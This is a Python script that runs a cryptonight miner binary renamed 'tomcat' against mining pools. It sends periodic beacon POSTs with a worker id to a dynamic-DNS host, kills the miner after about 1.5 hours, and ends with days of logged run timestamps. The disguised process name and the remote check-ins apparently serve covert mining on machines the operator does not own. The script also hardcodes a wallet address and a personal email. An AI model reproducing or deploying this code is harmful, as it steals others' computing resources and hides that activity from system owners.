import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:04.797186
#2018-02-17 16:42:01.889057
#2018-02-17 18:29:05.510216
#2018-02-17 20:18:07.158089
#2018-02-17 22:06:06.543405
#2018-02-17 23:50:03.832020
#2018-02-18 01:40:01.748749
#2018-02-18 03:27:03.699085
#2018-02-18 05:14:05.155684
#2018-02-18 07:06:03.586706
#2018-02-18 08:53:06.891617
#2018-02-18 10:40:07.817369
#2018-02-18 12:25:06.038657
#2018-02-18 14:13:04.435883
#2018-02-18 16:03:03.903339
#2018-02-18 17:51:07.408260
#2018-02-18 19:38:04.806333
#2018-02-18 21:23:03.998710
#2018-02-18 23:12:06.271519
#2018-02-19 00:58:05.661637
#2018-02-19 02:46:03.313244
#2018-02-19 04:31:06.104202
#2018-02-19 06:16:05.433419
#2018-02-19 08:04:06.250720
#2018-02-19 09:54:05.654306
#2018-02-19 11:43:01.824878
#2018-02-19 13:30:11.312837
#2018-02-19 15:19:01.751606
#2018-02-19 17:06:09.025027
#2018-02-19 18:52:05.075164
#2018-02-19 20:41:07.134518
#2018-02-19 22:28:01.779532
#2018-02-20 00:15:07.742716
#2018-02-20 02:03:05.264063
#2018-02-20 03:53:03.715301
#2018-02-20 05:37:06.171989
#2018-02-20 07:22:06.676891
#2018-02-20 09:07:08.271018
#2018-02-20 10:50:08.321840
#2018-02-20 12:37:04.620281
#2018-02-20 14:23:05.749675
#2018-02-20 16:09:08.272874
#2018-02-20 17:56:01.765524
#2018-02-20 19:47:07.202575
#2018-02-20 21:37:02.200813
#2018-02-20 23:20:06.693654
#2018-02-21 01:06:04.469288
#2018-02-21 02:54:04.250457
#2018-02-21 04:41:08.282148
#2018-02-21 06:29:04.791046
#2018-02-21 08:13:04.119182
#2018-02-21 09:59:01.970895
#2018-02-21 11:47:01.814632
#2018-02-21 13:38:07.967993
#2018-02-21 15:22:03.794975
#2018-02-21 17:12:07.742932
#2018-02-21 19:01:01.678815
#2018-02-21 20:49:05.389255
#2018-02-21 22:33:01.634822
#2018-02-22 00:23:05.480160
#2018-02-22 02:10:08.381720
#2018-02-22 03:55:07.890782
#2018-02-22 05:42:06.737684
#2018-02-22 07:27:04.088154
#2018-02-22 09:15:01.566435
#2018-02-22 11:02:03.173036
#2018-02-22 12:47:06.587983
#2018-02-22 14:33:04.348493
#2018-02-22 16:21:04.432100
#2018-02-22 18:07:05.866086
#2018-02-22 19:55:10.144980
#2018-02-22 21:44:09.391902
#2018-02-22 23:32:01.808746
#2018-02-23 01:20:04.132464
#2018-02-23 03:06:05.674538
#2018-02-23 04:52:04.792752
#2018-02-23 06:38:01.478639
#2018-02-23 08:26:08.403619
#2018-02-23 10:41:06.877478
#2018-02-23 12:39:06.431075
#2018-02-23 14:24:02.180933
#2018-02-23 16:15:03.377118
#2018-02-23 18:02:04.619381
#2018-02-23 19:47:03.723241
#2018-02-23 21:29:07.019268
#2018-02-23 23:18:05.634564
#2018-02-24 01:08:07.251364
#2018-02-24 02:59:06.097516
#2018-02-24 04:46:07.089188
#2018-02-24 06:31:06.178752
#2018-02-24 08:19:03.926911
#2018-02-24 10:03:03.861815
#2018-02-24 12:01:01.929618
#2018-02-24 13:49:01.419679
#2018-02-24 15:45:08.319516
#2018-02-24 17:41:03.992802
#2018-02-24 19:26:05.363606
#2018-02-24 21:17:03.617334
#2018-02-24 23:54:01.232516
#2018-02-25 03:11:04.177917
#2018-02-25 06:56:01.456728